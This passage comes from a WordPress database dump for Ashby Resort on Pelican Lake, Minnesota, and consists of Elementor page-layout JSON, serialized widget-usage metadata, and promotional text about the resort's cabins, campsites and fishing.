"id\":\"7395e62\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/06\\/62208139_2851471431591627_415800096072925184_n.jpg\",\"id\":872}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5059136\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"f79900a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"c62f6fe\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"03f9966\"}]},\"elements\":[{\"id\":\"b8cd8b3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/06\\/IMG_2971.jpg\",\"id\":874}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b577c8c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"021ef74\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"1b48237\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"315f485\"}]},\"elements\":[{\"id\":\"32dfd9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9e22c3f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"a9d368f\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"5526c8c\"}]},\"elements\":[{\"id\":\"1a58fd3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3810.jpg\",\"id\":495}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9318e77\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"c458907\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ce9fbab\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"ec695bc\"}]},\"elements\":[{\"id\":\"891ac80\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3598.jpg\",\"id\":493}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ba07af4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"b38d892\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d2534d1\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"129c6ce\"}]},\"elements\":[{\"id\":\"260f883\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3565.jpg\",\"id\":490}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d643c63\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"0b34039\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"0408d03\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"a474735\"}]},\"elements\":[{\"id\":\"a0b27ca\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3540.jpg\",\"id\":489}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"eb81b03\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"7aa2fd3\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"e596e7c\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"b1b9de5\"}],\"content_width\":{\"unit\":\"px\",\"size\":1274,\"sizes\":[]}},\"elements\":[{\"id\":\"b77d62a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"b5efcf7\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"92f19c4\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"6947ee9\"}]},\"elements\":[{\"id\":\"4a4a9e2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/06\\/IMG_2933.jpg\",\"id\":875}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"774d3f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8258c6f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9aa1d2e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"21f8b67\"}]},\"elements\":[{\"id\":\"1292ee5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/09\\/67664725_2541790915884778_4081940006199885824_n.jpg\",\"id\":912}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"37d43aa\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"78ff838\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8f89e7a\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"38c4cb9\"}]},\"elements\":[{\"id\":\"6ea5dc9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/09\\/67354008_2515260805204456_2096376990331305984_n.jpg\",\"id\":911}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"288c56e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2fdbe18\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"984dd77\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"7d5d219\"}]},\"elements\":[{\"id\":\"9ca33fb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/06\\/IMG_2905.jpg\",\"id\":873}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b3d678\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"3442456\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"22ea8d6\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"34881c4\"}]},\"elements\":[{\"id\":\"58b2643\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"b073176\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"26e79f9\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"a64f106\"}]},\"elements\":[{\"id\":\"f687d69\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Pelican lake has wonderful walleye, bass, northern, crappie and sunfish.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2965,940,'_elementor_edit_mode','builder'),(2966,940,'_elementor_template_type','kit'),(2967,940,'vantage_panels_no_legacy','true'),(2969,837,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:2;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:1:{s:5:\"align\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:4;}}s:5:\"style\";a:1:{s:21:\"eae_animated_gradient\";a:1:{s:19:\"gradient_color_list\";i:5;}}}}s:6:\"button\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_button\";a:3:{s:4:\"text\";i:1;s:4:\"link\";i:1;s:5:\"align\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:2:{s:17:\"button_text_color\";i:1;s:16:\"background_color\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:2;}}s:5:\"style\";a:1:{s:21:\"eae_animated_gradient\";a:1:{s:19:\"gradient_color_list\";i:3;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(2970,789,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:7;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:7;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:10;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:5:\"style\";a:1:{s:21:\"eae_animated_gradient\";a:1:{s:19:\"gradient_color_list\";i:10;}}s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:9;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:5:\"style\";a:1:{s:21:\"eae_animated_gradient\";a:1:{s:19:\"gradient_color_list\";i:4;}}s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:3;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:1:{s:11:\"title_color\";i:3;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:9;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:1:{s:5:\"image\";i:9;}}}}}'),(2971,752,'_elementor_controls_usage','a:4:{s:5:\"image\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:1:{s:5:\"image\";i:4;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:8;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:8;}}s:5:\"style\";a:1:{s:21:\"eae_animated_gradient\";a:1:{s:19:\"gradient_color_list\";i:8;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:4;}}s:5:\"style\";a:1:{s:21:\"eae_animated_gradient\";a:1:{s:19:\"gradient_color_list\";i:4;}}}}}'),(2972,732,'_elementor_controls_usage','a:7:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:11;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:5:\"style\";a:1:{s:21:\"eae_animated_gradient\";a:1:{s:19:\"gradient_color_list\";i:11;}}s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:10;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:5:\"style\";a:1:{s:21:\"eae_animated_gradient\";a:1:{s:19:\"gradient_color_list\";i:3;}}s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:2;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:6:\"button\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:8:\"progress\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:11:\"star-rating\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}}'),(2974,473,'_elementor_controls_usage','a:4:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:16;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:5:\"style\";a:1:{s:21:\"eae_animated_gradient\";a:1:{s:19:\"gradient_color_list\";i:16;}}s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:15;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:5:\"style\";a:1:{s:21:\"eae_animated_gradient\";a:1:{s:19:\"gradient_color_list\";i:6;}}s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:5;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:15;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:2:{s:5:\"image\";i:15;s:10:\"image_size\";i:9;}}}}}'),(2976,107,'_elementor_controls_usage','a:4:{s:5:\"image\";a:3:{s:5:\"count\";i:12;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:1:{s:5:\"image\";i:12;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:13;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:12;}}s:5:\"style\";a:1:{s:21:\"eae_animated_gradient\";a:1:{s:19:\"gradient_color_list\";i:13;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:4;}}s:5:\"style\";a:1:{s:21:\"eae_animated_gradient\";a:1:{s:19:\"gradient_color_list\";i:5;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}}}}'),(2977,92,'_elementor_controls_usage','a:3:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:21:\"eae_animated_gradient\";a:1:{s:19:\"gradient_color_list\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:21:\"eae_animated_gradient\";a:1:{s:19:\"gradient_color_list\";i:1;}}}}}'),(2978,84,'_elementor_controls_usage','a:4:{s:5:\"image\";a:3:{s:5:\"count\";i:8;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:1:{s:5:\"image\";i:8;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:9;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:8;}}s:5:\"style\";a:1:{s:21:\"eae_animated_gradient\";a:1:{s:19:\"gradient_color_list\";i:9;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:2;}}s:5:\"style\";a:1:{s:21:\"eae_animated_gradient\";a:1:{s:19:\"gradient_color_list\";i:3;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}}}}'),(2979,81,'_elementor_controls_usage','a:4:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:2;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:24;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:5:\"style\";a:1:{s:21:\"eae_animated_gradient\";a:1:{s:19:\"gradient_color_list\";i:24;}}s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:22;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:8;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:5:\"style\";a:1:{s:21:\"eae_animated_gradient\";a:1:{s:19:\"gradient_color_list\";i:8;}}s:6:\"layout\";a:2:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:6;}s:14:\"section_layout\";a:1:{s:13:\"content_width\";i:1;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:24;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:2:{s:5:\"image\";i:24;s:10:\"image_size\";i:1;}}}}}'),(2980,64,'_elementor_controls_usage','a:4:{s:5:\"image\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:1:{s:5:\"image\";i:4;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:4;}}s:5:\"style\";a:1:{s:21:\"eae_animated_gradient\";a:1:{s:19:\"gradient_color_list\";i:5;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:1;}}s:5:\"style\";a:1:{s:21:\"eae_animated_gradient\";a:1:{s:19:\"gradient_color_list\";i:2;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}}}}'),(2981,61,'_elementor_controls_usage','a:4:{s:5:\"image\";a:3:{s:5:\"count\";i:8;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:2:{s:5:\"image\";i:8;s:10:\"image_size\";i:2;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:9;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:9;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:9;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:8;}}s:5:\"style\";a:1:{s:21:\"eae_animated_gradient\";a:1:{s:19:\"gradient_color_list\";i:9;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:3;}}s:5:\"style\";a:1:{s:21:\"eae_animated_gradient\";a:1:{s:19:\"gradient_color_list\";i:4;}}}}}'),(2982,52,'_elementor_controls_usage','a:4:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:3;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:12;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:5:\"style\";a:1:{s:21:\"eae_animated_gradient\";a:1:{s:19:\"gradient_color_list\";i:12;}}s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:9;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:5:\"style\";a:1:{s:21:\"eae_animated_gradient\";a:1:{s:19:\"gradient_color_list\";i:6;}}s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:3;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:9;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:1:{s:5:\"image\";i:9;}}}}}'),(2983,46,'_elementor_controls_usage','a:4:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:4;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:14;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:11;}}s:5:\"style\";a:1:{s:21:\"eae_animated_gradient\";a:1:{s:19:\"gradient_color_list\";i:14;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:9;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_image\";a:4:{s:5:\"image\";i:9;s:10:\"image_size\";i:1;s:22:\"image_custom_dimension\";i:1;s:5:\"align\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_style_image\";a:3:{s:19:\"image_border_border\";i:1;s:18:\"image_border_width\";i:3;s:18:\"image_border_color\";i:3;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:7;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:4;}}s:5:\"style\";a:2:{s:21:\"eae_animated_gradient\";a:1:{s:19:\"gradient_color_list\";i:7;}s:14:\"section_border\";a:1:{s:13:\"border_border\";i:3;}}}}}'),(2984,43,'_elementor_controls_usage','a:3:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:21:\"eae_animated_gradient\";a:1:{s:19:\"gradient_color_list\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:21:\"eae_animated_gradient\";a:1:{s:19:\"gradient_color_list\";i:1;}}}}}'),(2985,40,'_elementor_controls_usage','a:4:{s:5:\"image\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:1:{s:5:\"image\";i:6;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:7;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:6;}}s:5:\"style\";a:1:{s:21:\"eae_animated_gradient\";a:1:{s:19:\"gradient_color_list\";i:7;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:2;}}s:5:\"style\";a:1:{s:21:\"eae_animated_gradient\";a:1:{s:19:\"gradient_color_list\";i:3;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}}}}'),(2986,37,'_elementor_controls_usage','a:4:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:5:\"style\";a:1:{s:21:\"eae_animated_gradient\";a:1:{s:19:\"gradient_color_list\";i:5;}}s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:4;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:5:\"style\";a:1:{s:21:\"eae_animated_gradient\";a:1:{s:19:\"gradient_color_list\";i:2;}}s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:1;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:2;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:5:{s:5:\"image\";i:4;s:7:\"caption\";i:4;s:7:\"link_to\";i:4;s:4:\"link\";i:4;s:14:\"caption_source\";i:4;}}}}}'),(3005,941,'_wp_page_template','default'),(3006,941,'_elementor_edit_mode','builder'),(3007,941,'_elementor_template_type','post'),(3008,941,'_elementor_version','2.5.12'),(3009,941,'_elementor_data','[{\"id\":\"2dc9fcd\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"f475f02\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"1c5c7f3\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"aeae2a8\"}]},\"elements\":[{\"id\":\"6a08dc2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"73a93c6\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9709d19\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"71dc072\"}]},\"elements\":[{\"id\":\"1a258be\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>IF YOUR LOOKING FOR A VACATION DREAM<br \\/>WE HAVE YOUR DREAM VACATION<\\/strong><\\/p><p>Relax, Unwind and enjoy the sunsets !!<\\/p><p>Ashby Resort is located in Grant County, Minnesota on beautiful Pelican Lake.The lake is approx. 4,000 acres. We are just off highway 94 midway between Alexandria and Fergus Falls.<br \\/>Ashby Resort is a family owned fishing resort. Owner, Dean Beneke, is here to help you enjoy a timeless Minnesota fishing tradition.<br \\/>Approximately 80% of our customer\'s return to the resort each year and many have done it for several generations.<br \\/>The Resort is nestled on 10 acres of land on the north side of the lake and has something for everyone. The ultimate location for your family\'s reunion. We have five Cabins, seven Motel rooms both with and without Kitchens and a newly remodeled 2 bedroom lakeside villa. There are also 16 lakeside\\/view campsites for your camper or tent.<\\/p><p>Gently sloping sandy beach\\/swim 